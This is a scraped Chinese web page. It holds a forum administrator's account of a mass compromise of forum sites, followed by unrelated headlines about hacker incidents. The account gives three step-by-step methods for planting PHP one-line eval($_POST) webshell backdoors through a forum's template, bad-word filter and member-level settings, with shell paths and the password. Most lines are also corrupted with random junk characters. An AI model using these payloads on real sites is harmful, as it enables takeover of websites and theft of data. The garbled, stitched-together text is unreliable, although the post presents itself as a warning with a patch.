郁闷,刚居然没提交成功,写那么多都白写了。.. mIw<ak9
哎... ,f$_53 ;!
今天下午5点多论坛出现问题,国内几个大站也相继被挂马,从QQ上站长找我的时间
来看几乎是一个时间段爆发的.也就是说工具
估计是在下午5:20左右公布出来的 2VWd(!l
因为当时因为急着有事,我没做什么处理就是关闭了下论坛,把相关几个敏感的地方做了修改.. imR B_ut
呵呵,
其实这次漏洞的利用出在require文件夹中的一个文件过滤不严格造成的,可以任意修改别人的密码 .. lGd[<14LO
漏洞最先由国外某安全组织发布出来.接着由NEAOO发布到自己的BLOG上,于是下午5点多大规模爆发. 7hGe[!&l
简单的分析下华北此次被入侵过程. sU at{j1
17:26分黑客使用利用工具修改了我的管理员密码,此时的IP为221.226.90.135,修改后没有立即进行修改,而是做了一个比较聪明的举动,呵呵,估计知道华北的前身吧,他居然在前台上传附件,然后在附件中放如他的木马,呵呵,比较聪明的一招..可最后删除了这个帖子,进入后台修改了风格中的CSS文件,挂了他的木马.挂的木马是最新的那个过全系统的网马,危害很大.. lnm(vC%
从入侵过程来看,持续了5分钟左右,从手段以及速度分析此人
不过是个小辈而已(呵呵,就是说你小辈,怎么了?不服气,有本事在来啊,呵呵,欢迎你继续.) GSi=V
今天要不是因为个人问题,我们估计就
有的完了,呵呵 seXv9ED*
以下是黑客进入后台中可能挂马以及六后门的地方,请大家注意 8%*|V g
r'{ <p
方式1 模板法 k45:B(F
< g{%(*[
进入后台, 风格模版设置 ,在随便一行写代码 (4 b8
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。 &rGiyP(L
EOT; ;Qrs#vSG
eval($a); bhLz)cEXr
print << H(Bss~u
s_a J|bU
例如,我写完某一行为。 T+CS1 L5J
.headurl { color:#ffffff;} !: yW`n'A
EOT; 7! DR31c4
eval($_POST[’a’]); il#XVY>MM
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;} 2`"8 =j
AWV"S@[;
而后得到一个shell jHCB$ZQb
http://localhost/bbs/index.php >"b0!e
(由于写到css里,也许有的操作无法返回,
但是只要没有什么问题,一般操作都是可以接受的) Y!`B,QLR
密码是a lanker的一句话后门。 lh)O/=@d
E9@Z{<C1F
方式2 脏话过滤法 pWJrf%
7,<cS8+
进入安全管理 ◇ 不良
词语过滤 |dt cb
.5y ;a/ZG
新增 V_lrIB*&
不良词语写 a’]=’aa’;eval($_POST[’a’]);// Q)9KQs
替换为那里可以随意写 hY q;P{mh
lsx x@W1
而后得到一个shell地址为 pi}/xz`C
http://localhost/bbs/data/bbscache/wordsfb.php R UffDa
W99vV0lqh
密码是a lanker的一句话后门。 #qW{ :
Q6zo1
方式3 用户等级管理 #1Ye#D/ug
然后新建立会员组 7&e1$NJ
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);// A($xXm
升级点数依然可以随意写。 s?K7o4:#
|J7kPFl
而后得到一个shell地址为 <V#G\Gqva
http://localhost/bbs/data/bbscache/level.php U{<7u\M-
密码是a lanker的一句话后门。 e[ aA"T
>s/~fm+Y
这里提供的方式随便你选一种都可以得到shell。。。 (Q8*#.`i
方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负 Pq{~jW?
附件中给出利用工具以及修补办法,请
各位站长及时修补并检查后门 )i>-~
补丁使用说明: 解压缩补丁包后将里面的upload目录覆盖论坛目录即可! Sa8[ k1V[E
最后:强烈
鄙视下今天下午挂马的那位朋友的技术.太菜.呵呵..
黑客你是如此猖狂
时间: 2024-10-30 14:20:44
黑客你是如此猖狂的相关文章
黑客自曝公共场合伪造WiFi 盗用户个人信息
摘要: 广州多个公共场合均有免费的WiFi(无线网络),很多手机用户都会不假思索就连接上网,以为蹭了免费占了便宜,殊不知却可能掉入陷阱.近日,有黑客自曝在星巴克.麦当劳(微博)这些 广州多个公共场合均有免费的WiFi(无线网络),很多手机用户都会不假思索就连接上网,以为蹭了免费占了便宜,殊不知却可能掉入"陷阱".近日,有黑客自曝在星巴克.麦当劳(微博)这些提供免费WiFi的公共场合,用一台Win7系统电脑.一套无线网络及一个网络包分析软件,15分钟就可以窃取手机上网用户的个人信息和密码
北京拟建免费WiFi平台 每天可免费上网2小时
已静悄悄存在四年之久的免费WiFi平台"My Beijing"或将进入更为市场化的"2.0版本".记者从北京市政府采购网发现,"北京市免费无线接入服务管理平台建设项目中标结果公告"已于日前披露,北京歌华有线电视网络股份有线公司和爱思特(北京)网络科技有线公司中标,企业将自筹资金运营"-My Beijing-"无线局域网络服务.值得一提的是,与此前尝试的纯公共服务性质不同,中标企业可以在政府审核后基于"My Beiji
黑客太猖狂曝光亚马逊等网站1.3万个信用卡号码
黑客太猖狂 曝光亚马逊等网站1.3万个信用卡号码12月27日消息,继黑客连续攻击索尼影业之后,近日亚马逊及沃尔玛等网站也遭遇了黑客的袭击.随即,该黑客组织在网上公布了一份文件,该文件包含1.3万 个用户名和密码,以及信用卡号码.这群黑客自称率属于Anonymous的黑客组织,其窃取的个人信息被放置在一个文本文件中,这一文件被上传至文件共享网站Ghostbin.遭到攻击的网站包括色情网站.游戏网站,以及电商网站.最主要的受害者包括游戏网络微软Xbox Live.索尼PSN和Twitch.tv.此外
站长网播报:支付宝淘宝认证存漏洞黑客猖狂 腾讯或将联姻大众点评
中介交易 SEO诊断淘宝客 站长团购 云主机 技术大厅 1. 支付宝和淘宝认证存漏洞 黑客可登陆他人账号 2月17日消息,乌云平台有消息爆出,称淘宝和支付宝认证存在安全缺陷,黑客可以简单利用该漏洞登陆他人淘宝和支付宝账号进行操作,目前不清楚是否影响余额宝等业务,乌云已经将漏洞细节提交至厂商. 截止目前,阿里方面还未对此事发表看法. 由于淘宝和支付宝目前已经是国内最大的B2C和第三方支付平台,因此其账号安全备受外界关注,我们也将继续关注此事进展. 2. 大众点评下周将开发布会,腾讯联姻大众点评?
勒索软件猖狂 黑客向银行索要赎金
犯罪分子威胁要揭露"偷税漏税" 数天前,有黑客入侵列支敦士登银行,威胁客户称:若不支付赎金,将曝光账户数据.攻击者获取到了中国人开设的富帝银行(列支敦士登)账户数据,从中抽取了大量客户的信息,包括德国和其他地方的政治人物.演员及富裕人士. 据称,黑客要求:若想信息不被曝光,就要以比特币的形式支付账户余额的10%.攻击者将赎金支付最后期限设定在12月7日,若逾期未付,信息将被报给政府机构和媒体.该银行没有立即回应评论请求. 总监安德里亚斯·因萨姆称,银行已通告相关机构调查正在进行中. 网
黑客猖狂 美国国家情报总监私人账户被黑
北京时间1月13日消息,据科技网站ZDNet报道,黑客们可真是和美国情报机关结上梁子了,几个月前他们刚刚黑掉了CIA局长布伦南的email账户,现在又一次卷土重来,直接攻破了美国国家情报总监詹姆斯·克拉珀(James Clapper)的数个私人账户. 据美国网站Motherboard报道,这批黑客和黑掉CIA局长emali的是同一伙人,他们声称已经掌握了克拉珀的数个私人账户,包括email,网络和电话账户.黑客们甚至搞了恶作剧,将克拉珀家的电话全部转接到了自由巴勒斯坦运动办公室. 不过美国国家情
国外盗版也猖狂,俄罗斯黑客为炫耀电脑技术破解软件
据中国之声<全球华语广播网>报道,最近,青岛的李先生在亚马逊网站购买了一本建筑师考试的复习题,但他怀疑自己买到了盗版书.为了搞清楚事实,李先生又购买了两本教辅书,经过验证比对,最终发现这两本书也都是盗版书.李先生把情况反映给了亚马逊网站. 工作人员称,亚马逊对此有严格规定,如果这几本书真是盗版,将会对卖家进行相应的惩罚. 日本:消费者购买盗版可能坐牢 近年来,国家不断加大打击盗版的力度,但仍有一些不法商人铤而走险.在国际上,如何根除盗版也是各国政府努力的方向.<全
“中国黑客”这10年的嬗变
"熊猫烧香"."小浩病毒"在网络上猖狂,不少网络用户被染上病毒,网络安全在次敲响警钟. 六年前,"中国鹰盟"成立之初,黑客万涛吟咏着"我们要做民族的精英,我们会永远战斗不息",他的经典台词是为刺刀装上理想,像拿破仑的军队那样.现在,2007年9月11日,远在成都出差的中年白领,惦记着夜晚的宵夜,然后悲哀地承认,如今的黑客圈是"名利场和大染缸",他宁愿选择"永远缅怀". 龚蔚,十年前成立中
限制Windows7磁盘空间巧防黑客入侵
你是不是也面临着对黑客的猖狂入侵而束手无策的烦恼呢?首先我们了解到在大多数情况下黑客入侵远程系统必须把木马程序或后门程序上传到远程系统当中,这种恶意入侵除了杀毒软件外,还可通过安全强度更高的Win7系统以及该系统下的磁盘配额来加强防范哦!下面就来分享具体实施办法: 一.防范原理 Win7系统针对NTFS分区有一个"磁盘配额"的功能,它可以对NTFS磁盘空间进行限制.比如,除自己外其他登陆用户只允许使用多少空间.拒绝其他用户写入某个大小的文件等. 运用此原理,我们就可以做出限制,使用&q